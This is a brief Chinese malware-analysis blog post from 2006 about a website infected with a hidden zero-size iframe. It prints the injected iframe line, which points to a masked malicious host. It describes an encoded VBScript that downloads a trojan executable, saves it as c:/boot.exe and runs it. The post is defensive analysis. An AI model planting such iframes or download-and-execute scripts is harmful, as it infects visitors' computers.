本文分析了一种通过网页iframe标签植入恶意代码的技术手段。该恶意代码使用了加密的VBscript脚本,利用Microsoft.XMLHTTP和FileSystemObject下载并执行了一个名为z*l.exe的木马程序,该木马被安全软件识别为Trojan-Downloader.Win32.Delf.ajm或Trojan.DL.Multi.wen。
endurer 原创
2006-12-06 第1版
该网站首页末被<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加入</a></nobr>代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为escape()<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加密</a></nobr>的VBscrīpt<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>脚本</a></nobr>代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
z*l.exe Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm,<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>瑞星</a></nobr>报为Trojan.DL.Multi.wen。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
